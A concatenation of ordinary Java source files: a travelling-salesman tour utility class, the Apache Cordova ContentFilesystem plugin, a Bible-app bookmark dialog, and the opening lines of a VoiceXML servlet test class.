private static String lineBreak = "";
public static String toString(Map<Integer, OpNode> structure) {
String result = "" + lineBreak;
for (Integer key : structure.keySet()) {
result += "i(" + key + ")" + structure.get(key).toString() + ")||" + lineBreak;
}
return result + lineBreak;
}
/**
* Generates the {@link OpNode} out of the Integer values. The keys in the
* returned {@link Map} are the original indexes.
*
* @param tour
* @return
*/
public static Map<Integer, OpNode> constrcutOpNodes(Integer[] tour) {
Map<Integer, OpNode> result = new HashMap<>();
// Build middle part.
for (int i = 0; i < tour.length; i++) {
OpNode next = new OpNode(tour[i]);
result.put(i, next);
int pi = (i - 1) % tour.length;
pi = (pi < 0) ? pi + tour.length : pi;
OpNode previous = result.get(pi);
if (previous != null) {
previous.setNext(next);
next.setPrevious(previous);
}
}
// Set next and previous from last and first.
OpNode first = result.get(0);
OpNode last = result.get(tour.length - 1);
last.setNext(first);
first.setPrevious(last);
return result;
}
/**
* Removes the element with the given index from the tour, returns a new tour.
*
* @param tour
* @param toRemoveIndex
* @return
*/
public static Integer[] removeAndCopy(Integer[] tour, int toRemoveIndex) {
Integer[] result = new Integer[tour.length - 1];
System.arraycopy(tour, 0, result, 0, toRemoveIndex);
System.arraycopy(tour, toRemoveIndex + 1, result, toRemoveIndex, tour.length - toRemoveIndex - 1);
return result;
}
/**
* Removes an index out of the tour, returns a copy.
*
* @param tour
* @param indexI
* @return
*/
public static Integer[] remove(Integer[] tour, int indexI) {
Integer[] result = new Integer[tour.length - 1];
int correct = 0;
for (int i = 0; i < tour.length; i++) {
if (i != indexI) {
result[i - correct] = tour[i];
} else {
correct = 1;
}
}
return result;
}
public static double getDistance(Map<Integer, OpNode> structure, IDistanceCalculator distanceCalculator) {
double distance = 0;
Set<OpNode> handled = new HashSet<>();
OpNode workWith = structure.get(structure.keySet().iterator().next());
while (!handled.contains(workWith)) {
distance += distanceCalculator.getDistance(workWith.getValue(), workWith.getNext().getValue());
handled.add(workWith);
workWith = workWith.getNext();
}
return distance;
}
public static Integer[] getTour(Map<Integer, OpNode> tour) {
if (tour == null) {
logger.trace("Can not build Integer[] tour because tour is null");
return null;
}
Integer[] result = new Integer[tour.size()];
Set<OpNode> handled = new HashSet<>();
OpNode workWith = tour.get(tour.keySet().iterator().next());
int insert = 0;
while (!handled.contains(workWith)) {
result[insert++] = workWith.getValue();
handled.add(workWith);
workWith = workWith.getNext();
}
return result;
}
public static TourResult getTour(Map<Integer, OpNode> tour, int startIndex) {
if (tour == null) {
logger.trace("Can not build Integer[] tour because tour is null");
return null;
}
Integer[] result = new Integer[tour.size()];
int inserted = 0;
Set<OpNode> visited = new HashSet<>();
OpNode workWith = tour.get(startIndex);
visited.add(workWith);
result[inserted++] = workWith.getValue();
boolean tourIsValid = true;
while (visited.size() < result.length) {
OpNode newNext = workWith.getNext();
if (newNext != null && !visited.contains(newNext)) {
workWith = newNext;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
OpNode newNextOld = workWith.getNextOld();
if (newNextOld != null && !visited.contains(newNextOld)) {
workWith = newNextOld;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
OpNode previous = workWith.getPrevious();
if (previous != null && !visited.contains(previous)) {
workWith = previous;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
OpNode previousOld = workWith.getPreviousOld();
if (previousOld != null && !visited.contains(previousOld)) {
workWith = previousOld;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
tourIsValid = false;
break;
}
}
}
}
}
return new TourResult(tourIsValid, result);
}
public static class TourResult {
private final boolean validTour;
private final Integer[] tour;
public TourResult(boolean validTour, Integer[] tour) {
super();
this.validTour = validTour;
this.tour = tour;
}
public boolean isValidTour() {
return validTour;
}
public Integer[] getTour() {
return tour;
}
}
/**
* Returns the distance of the tour based on the given distance calculator.
*
* @param tour
* @param distanceCalculator
* @return
*/
public static double getDistance(Integer[] tour, IDistanceCalculator distanceCalculator) {
double cost = 0;
for (int i = 0; i < tour.length; i++) {
int index1 = tour[i];
int index2 = tour[(i + 1) % tour.length];
cost += distanceCalculator.getDistance(index1, index2);
}
return cost;
}
/**
* Reverts the edges between start and end.
*
* @param tour
* @param startRevert
* @param endRevert
*/
public static void revert(Map<Integer, OpNode> tour, int startRevert, int endRevert) {
startRevert = Util.adaptIndex(startRevert, tour.size());
endRevert = Util.adaptIndex(endRevert, tour.size());
OpNode startOpNode = tour.get(startRevert);
OpNode endOpNode = tour.get(endRevert);
if (startRevert == endRevert) {
tour.get(startRevert).revert();
} else {
OpNode toRevert = startOpNode;
while (true) {
OpNode nextToRevert = toRevert.getNext();
toRevert.revert();
toRevert = nextToRevert;
if (toRevert.equals(endOpNode)) {
break;
}
}
endOpNode.revert();
}
}
/**
* Inserts new edges between from and to.
*
* @param structure
* @param from
* @param to
*/
public static void insert(Map<Integer, OpNode> structure, int from, int to) {
from = Util.adaptIndex(from, structure.size());
to = Util.adaptIndex(to, structure.size());
OpNode f = structure.get(from);
OpNode t = structure.get(to);
f.insert(t);
}
/**
* Reverts a part of the tour within the tour. Works and returns a copy.
*
* @param tour
* @param startRevert
* @param endrevert
* @return
*/
public static Integer[] revertAndCopy(Integer[] tour, int startRevert, int endrevert) {
// Correct the indexes
startRevert = startRevert % tour.length;
startRevert = (startRevert < 0) ? startRevert + tour.length : startRevert;
endrevert = endrevert % tour.length;
endrevert = (endrevert < 0) ? endrevert + tour.length : endrevert;
Integer[] result = new Integer[tour.length];
int revertIndex = 0;
for (int i = 0; i < tour.length; i++) {
int value = tour[i];
if (i >= startRevert && i <= endrevert) {
value = tour[endrevert - revertIndex]; // reverse the segment's values, not its positions
revertIndex++;
}
result[i] = value;
}
return result;
}
/**
*
* @param tour
* - Indexes of the points in the Tour.
* @param neighbourhoodFrom
* - Index of the given tour which represents the point which is the
* start point for the neighbourhood
* @param neighbourhoodSize
* - Size of the neighbourhood.
* @param distanceCalculator
* - Calculates the distances between points based on the indexes of
* the points.
* @return a list of indexes from the given tour list which represent the
* neighbourhood
*/
public static int[] getNeighbourhoodIndexesAfterDistance(Integer[] tour, int neighbourhoodFrom, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
// Possible to start with negative indexes.
neighbourhoodFrom = neighbourhoodFrom % tour.length;
neighbourhoodFrom = (neighbourhoodFrom < 0) ? neighbourhoodFrom + tour.length : neighbourhoodFrom;
int[] neighbourhood = null;
if (tour.length > neighbourhoodSize) {
neighbourhood = new int[neighbourhoodSize];
int left = 1;
int right = 1;
for (int i = 0; i < neighbourhoodSize; i++) {
int indexLeft = (neighbourhoodFrom - left) % tour.length;
indexLeft = (indexLeft < 0) ? indexLeft + tour.length : indexLeft;
int indexRight = (neighbourhoodFrom + right) % tour.length;
indexRight = (indexRight < 0) ? indexRight + tour.length : indexRight;
// Note: caching from already calculated distances should be done by the
// IDistanceCalculator
double distanceLeft = distanceCalculator.getDistance(tour[neighbourhoodFrom], tour[indexLeft]);
double distanceRight = distanceCalculator.getDistance(tour[neighbourhoodFrom], tour[indexRight]);
if (distanceLeft < distanceRight) {
neighbourhood[i] = indexLeft;
left += 1;
} else {
neighbourhood[i] = indexRight;
right += 1;
}
}
} else {
neighbourhood = new int[tour.length - 1];
int filled = 0;
for (int i = 0; i < tour.length; i++) {
if (i != neighbourhoodFrom) {
neighbourhood[filled++] = i;
}
}
}
return neighbourhood;
}
/**
*
* @param tour
* - Indexes of the points in the Tour.
* @param neighbourhoodFromIndex
* - Index of the given tour which represents the point which is the
* start point for the neighbourhood
* @param neighbourhoodSize
* - Size of the neighbourhood.
* @param distanceCalculator
* - Calculates the distances between points based on the indexes of
* the points.
* @return a list of indexes from the given tour list which represent the
* neighbourhood
*/
public static int[] getNeighbourhoodIndexesFromIndexInTour(Integer[] tour, int neighbourhoodFromIndex, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
// Possible to start with negative indexes.
neighbourhoodFromIndex = neighbourhoodFromIndex % tour.length;
neighbourhoodFromIndex = (neighbourhoodFromIndex < 0) ? neighbourhoodFromIndex + tour.length : neighbourhoodFromIndex;
if(neighbourhoodSize >= tour.length) {
int[] result = new int[tour.length-1];
int offset = 0;
for(int i = 0; i < tour.length;i++) {
if(i != neighbourhoodFromIndex) {
result[i - offset] = i;
} else {
offset = 1;
}
}
return result;
}
List<Distance> distances = new ArrayList<>();
for (int i = 0; i < tour.length; i++) {
if (i != neighbourhoodFromIndex) {
double d = distanceCalculator.getDistance(tour[neighbourhoodFromIndex], tour[i]);
distances.add(new Distance(i, d));
}
}
Collections.sort(distances);
int[] neighbourhood = new int[neighbourhoodSize];
for (int i = 0; i < neighbourhoodSize; i++) {
neighbourhood[i] = distances.get(i).index;
}
return neighbourhood;
}
public static int[] getNeighbourhoodIndexesFromValue(Integer[] tour, Integer neighbourhoodFromValue, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
if(neighbourhoodSize >= tour.length) {
int[] result = new int[tour.length-1];
int offset = 0;
for(int i = 0; i < tour.length;i++) {
if (!tour[i].equals(neighbourhoodFromValue)) {
result[i - offset] = i;
} else {
offset = 1;
}
}
return result;
}
List<Distance> distances = new ArrayList<>();
for (int i = 0; i < tour.length; i++) {
if (!tour[i].equals(neighbourhoodFromValue)) {
double d = distanceCalculator.getDistance(tour[i], neighbourhoodFromValue);
distances.add(new Distance(i, d));
}
}
Collections.sort(distances);
int[] neighbourhood = new int[neighbourhoodSize];
for (int i = 0; i < neighbourhoodSize; i++) {
neighbourhood[i] = distances.get(i).index;
}
return neighbourhood;
}
public static class Distance implements Comparable<Distance> {
public int index;
public double distance;
public Distance(int index, double distance) {
super();
this.index = index;
this.distance = distance;
}
@Override
public int compareTo(Distance o) {
return Double.compare(distance, o.distance);
}
}
/**
 * Builds a neighbourhood by walking outwards from the start position along the tour itself,
 * always extending the side (left or right) whose accumulated tour distance is smaller.
 *
 * @param tour
 * - Indexes of the points in the tour.
 * @param neighbourhoodFrom
 * - Index into the given tour of the point that is the centre of the
 * neighbourhood.
 * @param neighbourhoodSize
 * - Size of the neighbourhood.
 * @param distanceCalculator
 * - Calculates the distances between points based on the indexes of
 * the points.
 * @return an array of indexes into the given tour which represent the
 * neighbourhood
 */
public static int[] getNeighbourhoodIndexesAfterDistanceOnTour(Integer[] tour, int neighbourhoodFrom, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
int[] neighbourhood = null;
if (tour.length > neighbourhoodSize) {
neighbourhood = new int[neighbourhoodSize];
int left = 1;
int right = 1;
double allDistanceLeft = 0.0;
double allDistanceRight = 0.0;
for (int i = 0; i < neighbourhoodSize; i++) {
int indexLeft1 = (neighbourhoodFrom - left) % tour.length;
indexLeft1 = (indexLeft1 < 0) ? indexLeft1 + tour.length : indexLeft1;
int indexLeft2 = (indexLeft1 + 1) % tour.length;
int indexRight1 = (neighbourhoodFrom + right) % tour.length;
int indexRight2 = (indexRight1 - 1) % tour.length;
indexRight2 = (indexRight2 < 0) ? indexRight2 + tour.length : indexRight2;
// Note: caching of already-calculated distances should be done by the
// IDistanceCalculator
double distanceLeftToPrevious = distanceCalculator.getDistance(tour[indexLeft2], tour[indexLeft1]);
double distanceRightToPrevious = distanceCalculator.getDistance(tour[indexRight2], tour[indexRight1]);
if (distanceLeftToPrevious + allDistanceLeft < distanceRightToPrevious + allDistanceRight) {
neighbourhood[i] = indexLeft1;
left += 1;
allDistanceLeft += distanceLeftToPrevious;
} else {
neighbourhood[i] = indexRight1;
right += 1;
allDistanceRight += distanceRightToPrevious;
}
}
} else {
neighbourhood = new int[tour.length - 1];
int filled = 0;
for (int i = 0; i < tour.length; i++) {
if (i != neighbourhoodFrom) {
neighbourhood[filled++] = i; // store the tour index, consistent with the branch above
}
}
}
return neighbourhood;
}
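/*
 * Behavioural note with a small example (illustrative only; the tour values and "calculator"
 * are assumptions): unlike the sorted variant above, this method walks outwards from the
 * start position along the tour, extending the side whose accumulated tour distance is smaller.
 *
 *   Integer[] tour = { 10, 11, 12, 13, 14 };
 *   int[] along = getNeighbourhoodIndexesAfterDistanceOnTour(tour, 0, 3, calculator);
 *   // "along" contains three indexes adjacent to position 0 on the tour (wrapping around the
 *   // ends), chosen by cumulative edge distance rather than direct distance to the start point.
 */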
/**
 * Returns the intersection between the two sets.
 *
 * @param setA the first set of values
 * @param setB the second set of values
 * @return the values present in both setA and setB, in no particular order
 */
public static final int[] getIntersection(int[] setA, int[] setB) {
HashSet<Integer> set1 = new HashSet<Integer>();
for (int i : setA) {
set1.add(i);
}
HashSet<Integer> set2 = new HashSet<Integer>();
for (int i : setB) {
if (set1.contains(i)) {
set2.add(i);
}
}
int[] result = new int[set2.size()];
int i = 0;
for (int n : set2) {
result[i++] = n;
}
return result;
}
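/*
 * Illustrative usage (sketch only):
 *
 *   int[] a = { 1, 2, 3, 4 };
 *   int[] b = { 3, 4, 5 };
 *   int[] common = getIntersection(a, b); // contains 3 and 4; order is not defined (HashSet)
 */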
}
|
|
/*
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
*/
package org.apache.cordova.file;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.InvocationTargetException;
import org.apache.cordova.CordovaInterface;
import org.apache.cordova.CordovaResourceApi;
import org.apache.cordova.CordovaWebView;
import org.apache.cordova.PluginManager;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.provider.MediaStore;
import android.provider.OpenableColumns;
public class ContentFilesystem extends Filesystem {
private CordovaInterface cordova;
private CordovaResourceApi resourceApi;
public ContentFilesystem(CordovaInterface cordova, CordovaWebView webView) {
super(Uri.parse("content://"), "content");
this.cordova = cordova;
Class<?> webViewClass = webView.getClass();
PluginManager pm = null;
// The PluginManager is exposed either via a getter or a public field depending on the
// Cordova version; try the getter first and silently fall back to the field.
try {
Method gpm = webViewClass.getMethod("getPluginManager");
pm = (PluginManager) gpm.invoke(webView);
} catch (NoSuchMethodException e) {
// ignored: fall through to the field lookup below
} catch (IllegalAccessException e) {
// ignored: fall through to the field lookup below
} catch (InvocationTargetException e) {
// ignored: fall through to the field lookup below
}
if (pm == null) {
try {
Field pmf = webViewClass.getField("pluginManager");
pm = (PluginManager) pmf.get(webView);
} catch (NoSuchFieldException e) {
// ignored: resourceApi is created with a null PluginManager in this case
} catch (IllegalAccessException e) {
// ignored: resourceApi is created with a null PluginManager in this case
}
}
this.resourceApi = new CordovaResourceApi(webView.getContext(), pm);
}
@Override
public JSONObject getEntryForLocalURL(LocalFilesystemURL inputURL) throws IOException {
if ("/".equals(inputURL.fullPath)) {
return LocalFilesystem.makeEntryForURL(inputURL, true, inputURL.URL.toString());
}
// Get the cursor to validate that the file exists
Cursor cursor = openCursorForURL(inputURL);
String filePath = null;
try {
if (cursor == null || !cursor.moveToFirst()) {
throw new FileNotFoundException();
}
filePath = filesystemPathForCursor(cursor);
} finally {
if (cursor != null)
cursor.close();
}
if (filePath == null) {
filePath = inputURL.URL.toString();
} else {
filePath = "file://" + filePath;
}
return makeEntryForPath(inputURL.fullPath, inputURL.filesystemName, false /*fp.isDirectory()*/, filePath);
}
@Override
public JSONObject getFileForLocalURL(LocalFilesystemURL inputURL,
String fileName, JSONObject options, boolean directory) throws IOException, TypeMismatchException, JSONException {
if (options != null) {
if (options.optBoolean("create")) {
throw new IOException("Cannot create content url");
}
}
LocalFilesystemURL requestedURL = new LocalFilesystemURL(Uri.withAppendedPath(inputURL.URL, fileName));
File fp = new File(this.filesystemPathForURL(requestedURL));
if (!fp.exists()) {
throw new FileNotFoundException("path does not exist");
}
if (directory) {
if (fp.isFile()) {
throw new TypeMismatchException("path doesn't exist or is file");
}
} else {
if (fp.isDirectory()) {
throw new TypeMismatchException("path doesn't exist or is directory");
}
}
// Return the entry for the requested file or directory
return makeEntryForPath(requestedURL.fullPath, requestedURL.filesystemName, directory, Uri.fromFile(fp).toString());
}
@Override
public boolean removeFileAtLocalURL(LocalFilesystemURL inputURL)
throws NoModificationAllowedException {
String filePath = filesystemPathForURL(inputURL);
File file = new File(filePath);
try {
this.cordova.getActivity().getContentResolver().delete(MediaStore.Images.Media.EXTERNAL_CONTENT_URI,
MediaStore.Images.Media.DATA + " = ?",
new String[] { filePath });
} catch (UnsupportedOperationException t) {
// Was seeing this on the File mobile-spec tests on 4.0.3 x86 emulator.
// The ContentResolver applies only when the file was registered in the
// first place, which is generally only the case with images.
}
return file.delete();
}
@Override
public boolean recursiveRemoveFileAtLocalURL(LocalFilesystemURL inputURL)
throws NoModificationAllowedException {
throw new NoModificationAllowedException("Cannot remove content url");
}
@Override
public JSONArray readEntriesAtLocalURL(LocalFilesystemURL inputURL)
throws FileNotFoundException {
// TODO Auto-generated method stub
return null;
}
@Override
public JSONObject getFileMetadataForLocalURL(LocalFilesystemURL inputURL) throws FileNotFoundException {
Integer size = null;
Integer lastModified = null;
Cursor cursor = openCursorForURL(inputURL);
try {
if (cursor != null && cursor.moveToFirst()) {
size = resourceSizeForCursor(cursor);
lastModified = lastModifiedDateForCursor(cursor);
} else {
throw new FileNotFoundException();
}
} finally {
if (cursor != null)
cursor.close();
}
JSONObject metadata = new JSONObject();
try {
metadata.put("size", size);
metadata.put("type", resourceApi.getMimeType(inputURL.URL));
metadata.put("name", inputURL.filesystemName);
metadata.put("fullPath", inputURL.fullPath);
metadata.put("lastModifiedDate", lastModified);
} catch (JSONException e) {
return null;
}
return metadata;
}
@Override
public JSONObject copyFileToURL(LocalFilesystemURL destURL, String newName,
Filesystem srcFs, LocalFilesystemURL srcURL, boolean move)
throws IOException, InvalidModificationException, JSONException,
NoModificationAllowedException, FileExistsException {
if (LocalFilesystem.class.isInstance(srcFs)) {
/* The source is a local filesystem, so we can shortcut with CordovaResourceApi stream operations */
// Figure out where we should be copying to
final LocalFilesystemURL destinationURL = makeDestinationURL(newName, srcURL, destURL);
OutputStream os = resourceApi.openOutputStream(destURL.URL);
CordovaResourceApi.OpenForReadResult ofrr = resourceApi.openForRead(srcURL.URL);
if (move && !srcFs.canRemoveFileAtLocalURL(srcURL)) {
throw new NoModificationAllowedException("Cannot move file at source URL");
}
try {
resourceApi.copyResource(ofrr, os);
} catch (IOException e) {
throw new IOException("Cannot read file at source URL");
}
if (move) {
srcFs.removeFileAtLocalURL(srcURL);
}
return makeEntryForURL(destinationURL, false, destinationURL.URL.toString());
} else {
// Need to copy the hard way
return super.copyFileToURL(destURL, newName, srcFs, srcURL, move);
}
}
@Override
public void readFileAtURL(LocalFilesystemURL inputURL, long start, long end,
ReadFileCallback readFileCallback) throws IOException {
CordovaResourceApi.OpenForReadResult ofrr = resourceApi.openForRead(inputURL.URL);
if (end < 0) {
end = ofrr.length;
}
long numBytesToRead = end - start;
try {
if (start > 0) {
ofrr.inputStream.skip(start);
}
LimitedInputStream inputStream = new LimitedInputStream(ofrr.inputStream, numBytesToRead);
readFileCallback.handleData(inputStream, ofrr.mimeType);
} finally {
ofrr.inputStream.close();
}
}
@Override
public long writeToFileAtURL(LocalFilesystemURL inputURL, String data,
int offset, boolean isBinary) throws NoModificationAllowedException {
throw new NoModificationAllowedException("Couldn't write to file given its content URI");
}
@Override
public long truncateFileAtURL(LocalFilesystemURL inputURL, long size)
throws NoModificationAllowedException {
throw new NoModificationAllowedException("Couldn't truncate file given its content URI");
}
protected Cursor openCursorForURL(LocalFilesystemURL url) {
ContentResolver contentResolver = this.cordova.getActivity().getContentResolver();
Cursor cursor = contentResolver.query(url.URL, null, null, null, null);
return cursor;
}
protected String filesystemPathForCursor(Cursor cursor) {
final String[] LOCAL_FILE_PROJECTION = { MediaStore.Images.Media.DATA };
int columnIndex = cursor.getColumnIndex(LOCAL_FILE_PROJECTION[0]);
if (columnIndex != -1) {
return cursor.getString(columnIndex);
}
return null;
}
protected Integer resourceSizeForCursor(Cursor cursor) {
int columnIndex = cursor.getColumnIndex(OpenableColumns.SIZE);
if (columnIndex != -1) {
String sizeStr = cursor.getString(columnIndex);
if (sizeStr != null) {
return Integer.parseInt(sizeStr,10);
}
}
return null;
}
protected Integer lastModifiedDateForCursor(Cursor cursor) {
final String[] LOCAL_FILE_PROJECTION = { MediaStore.MediaColumns.DATE_MODIFIED };
int columnIndex = cursor.getColumnIndex(LOCAL_FILE_PROJECTION[0]);
if (columnIndex != -1) {
String dateStr = cursor.getString(columnIndex);
if (dateStr != null) {
return Integer.parseInt(dateStr,10);
}
}
return null;
}
@Override
public String filesystemPathForURL(LocalFilesystemURL url) {
Cursor cursor = openCursorForURL(url);
try {
if (cursor != null && cursor.moveToFirst()) {
return filesystemPathForCursor(cursor);
}
} finally {
if (cursor != null)
cursor.close();
}
return null;
}
@Override
public LocalFilesystemURL URLforFilesystemPath(String path) {
// Returns null as we don't support reverse mapping back to content:// URLs
return null;
}
@Override
public boolean canRemoveFileAtLocalURL(LocalFilesystemURL inputURL) {
String path = filesystemPathForURL(inputURL);
File file = new File(path);
return file.exists();
}
@Override
OutputStream getOutputStreamForURL(LocalFilesystemURL inputURL)
throws IOException {
OutputStream os = resourceApi.openOutputStream(inputURL.URL);
return os;
}
}
|
|
package yuku.alkitab.base.dialog;
import android.app.AlertDialog;
import android.content.Context;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.graphics.ColorFilter;
import android.graphics.PorterDuff;
import android.graphics.drawable.Drawable;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.BaseAdapter;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
import yuku.afw.V;
import yuku.alkitab.base.S;
import yuku.alkitab.base.U;
import yuku.alkitab.base.dialog.LabelEditorDialog.OkListener;
import yuku.alkitab.debug.R;
import yuku.alkitab.model.Label;
import yuku.alkitab.model.Marker;
import yuku.devoxx.flowlayout.FlowLayout;
import java.util.Date;
import java.util.List;
import java.util.SortedSet;
import java.util.TreeSet;
public class TypeBookmarkDialog {
public interface Listener {
/** Called when this dialog is closed with the bookmark modified or deleted */
void onModifiedOrDeleted();
}
final Context context;
final AlertDialog dialog;
FlowLayout panelLabels;
LabelAdapter adapter;
EditText tCaption;
Marker marker;
int ariForNewBookmark;
int verseCountForNewBookmark;
String defaultCaption;
// optional
Listener listener;
// current labels (may not yet be in the db)
SortedSet<Label> labels = new TreeSet<>();
/**
 * Open the bookmark edit dialog, editing an existing bookmark.
 * @param context Activity context to create dialogs
 * @param _id database id of the marker to edit
 */
public static TypeBookmarkDialog EditExisting(Context context, long _id) {
return new TypeBookmarkDialog(context, S.getDb().getMarkerById(_id), null);
}
/**
 * Open the bookmark edit dialog for a new bookmark by ari.
 * @param context Activity context to create dialogs
 * @param ari ari of the verse the new bookmark points to
 * @param verseCount number of verses covered by the new bookmark
 */
public static TypeBookmarkDialog NewBookmark(Context context, int ari, final int verseCount) {
final TypeBookmarkDialog res = new TypeBookmarkDialog(context, null, S.activeVersion.referenceWithVerseCount(ari, verseCount));
res.ariForNewBookmark = ari;
res.verseCountForNewBookmark = verseCount;
return res;
}
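/*
 * Typical call site (illustrative sketch only; "activity", "ari" and "listener" are
 * placeholders, not values taken from this project):
 *
 *   TypeBookmarkDialog dialog = TypeBookmarkDialog.NewBookmark(activity, ari, 1);
 *   dialog.setListener(listener);
 *   dialog.show();
 */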
private TypeBookmarkDialog(final Context context, final Marker marker, String reference) {
this.context = context;
this.marker = marker;
if (reference == null) {
reference = S.activeVersion.referenceWithVerseCount(marker.ari, marker.verseCount);
}
defaultCaption = reference;
View dialogView = LayoutInflater.from(context).inflate(R.layout.dialog_edit_bookmark, null);
this.panelLabels = V.get(dialogView, R.id.panelLabels);
tCaption = V.get(dialogView, R.id.tCaption);
final Button bAddLabel = V.get(dialogView, R.id.bAddLabel);
bAddLabel.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
adapter = new LabelAdapter();
AlertDialog.Builder b = new AlertDialog.Builder(context)
.setTitle(R.string.add_label_title)
.setAdapter(adapter, bAddLabel_dialog_itemSelected)
.setNegativeButton(R.string.cancel, null);
adapter.setDialogContext(b.getContext());
b.show();
}
});
if (marker != null) {
labels = new TreeSet<>();
final List<Label> ll = S.getDb().listLabelsByMarker(marker);
labels.addAll(ll);
}
setLabelsText();
tCaption.setText(marker != null? marker.caption: reference);
this.dialog = new AlertDialog.Builder(context)
.setView(dialogView)
.setTitle(reference)
.setIcon(R.drawable.ic_attr_bookmark)
.setPositiveButton(R.string.ok, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
bOk_click();
}
})
.setNegativeButton(R.string.delete, new OnClickListener() {
@Override
public void onClick(final DialogInterface dialog, final int which) {
bDelete_click(marker);
}
})
.create();
}
void bOk_click() {
String caption = tCaption.getText().toString();
// If there is no caption (or only whitespace), fall back to the reference
if (caption.trim().length() == 0) {
caption = defaultCaption;
}
final Date now = new Date();
if (marker != null) { // update existing
marker.caption = caption;
marker.modifyTime = now;
S.getDb().insertOrUpdateMarker(marker);
} else { // add new
marker = S.getDb().insertMarker(ariForNewBookmark, Marker.Kind.bookmark, caption, verseCountForNewBookmark, now, now);
}
S.getDb().updateLabels(marker, labels);
if (listener != null) listener.onModifiedOrDeleted();
}
public void show() {
dialog.show();
}
public void setListener(Listener listener) {
this.listener = listener;
}
OnClickListener bAddLabel_dialog_itemSelected = new OnClickListener() {
@Override public void onClick(DialogInterface _unused_, int which) {
if (which == adapter.getCount() - 1) { // new label
LabelEditorDialog.show(context, "", context.getString(R.string.create_label_title), new OkListener() { //$NON-NLS-1$
@Override public void onOk(String title) {
final Label newLabel = S.getDb().insertLabel(title, null);
if (newLabel != null) {
labels.add(newLabel);
setLabelsText();
}
}
});
} else {
final Label label = adapter.getItem(which);
labels.add(label);
setLabelsText();
}
}
};
private View.OnClickListener label_click = new View.OnClickListener() {
@Override public void onClick(View v) {
final Label label = (Label) v.getTag(R.id.TAG_label);
if (label == null) return;
new AlertDialog.Builder(context)
.setMessage(context.getString(R.string.do_you_want_to_remove_the_label_label_from_this_bookmark, label.title))
.setPositiveButton(R.string.ok, new OnClickListener() {
@Override public void onClick(DialogInterface dialog, int which) {
labels.remove(label);
setLabelsText();
}
})
.setNegativeButton(R.string.cancel, null)
.show();
}
};
protected void bDelete_click(final Marker marker) {
if (marker == null) {
return; // bookmark not saved, so no need to confirm
}
new AlertDialog.Builder(context)
.setMessage(R.string.bookmark_delete_confirmation)
.setPositiveButton(R.string.yes, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
S.getDb().deleteMarkerById(marker._id);
if (listener != null) listener.onModifiedOrDeleted();
}
})
.setNegativeButton(R.string.no, null)
.show();
}
void setLabelsText() {
// remove the previously added label views first (children between the first and last are labels)
final int childCount = panelLabels.getChildCount();
if (childCount > 1) {
panelLabels.removeViews(1, childCount - 2);
}
int pos = 1;
for (Label label: labels) {
panelLabels.addView(getLabelView(label), pos++);
}
}
private View getLabelView(Label label) {
TextView res = (TextView) LayoutInflater.from(context).inflate(R.layout.label_x, null);
res.setLayoutParams(panelLabels.generateDefaultLayoutParams());
res.setText(label.title);
res.setTag(R.id.TAG_label, label);
res.setOnClickListener(label_click);
final Drawable drawableRight = res.getCompoundDrawables()[2];
final int labelColor = U.applyLabelColor(label, res);
if (drawableRight != null && labelColor != 0) {
drawableRight.mutate();
drawableRight.setColorFilter(labelColor, PorterDuff.Mode.MULTIPLY);
}
return res;
}
class LabelAdapter extends BaseAdapter {
private List<Label> labels;
private Context dialogContext;
public LabelAdapter() {
labels = S.getDb().listAllLabels();
dialogContext = context;
}
public void setDialogContext(Context dialogContext) {
this.dialogContext = dialogContext;
}
@Override public int getCount() {
return labels.size() + 1;
}
@Override public Label getItem(int position) {
return (position < 0 || position >= labels.size())? null: labels.get(position);
}
@Override public long getItemId(int position) {
return position;
}
@Override public View getView(int position, View convertView, ViewGroup parent) {
int type = getItemViewType(position);
View res = convertView != null? convertView: LayoutInflater.from(dialogContext).inflate(type == 0? R.layout.item_label_chooser: android.R.layout.simple_list_item_1, null);
if (type == 0) {
TextView text1 = V.get(res, android.R.id.text1);
Label label = getItem(position);
text1.setText(label.title);
U.applyLabelColor(label, text1);
} else {
TextView text1 = V.get(res, android.R.id.text1);
text1.setText(context.getString(R.string.create_label_titik3));
}
return res;
}
@Override public int getViewTypeCount() {
return 2;
}
@Override public int getItemViewType(int position) {
if (position == getCount() - 1) return 1;
return 0;
}
}
}
|
|
package com.almende.dialog.adapter;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import org.junit.Test;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import com.almende.dialog.TestFramework;
import com.almende.dialog.accounts.AdapterConfig;
import com.almende.dialog.adapter.VoiceXMLRESTProxy.Return;
import com.almende.dialog.example.agent.TestServlet;
import com.almende.dialog.model.Answer;
import com.almende.dialog.model.MediaProperty;
import com.almende.dialog.model.MediaProperty.MediaPropertyKey;
import com.almende.dialog.model.MediaProperty.MediumType;
import com.almende.dialog.model.Question;
import com.almende.dialog.model.Session;
import com.askfast.commons.entity.AdapterType;
import com.askfast.commons.utils.PhoneNumberUtils;
public class VoiceXMLServletTest extends TestFramework {
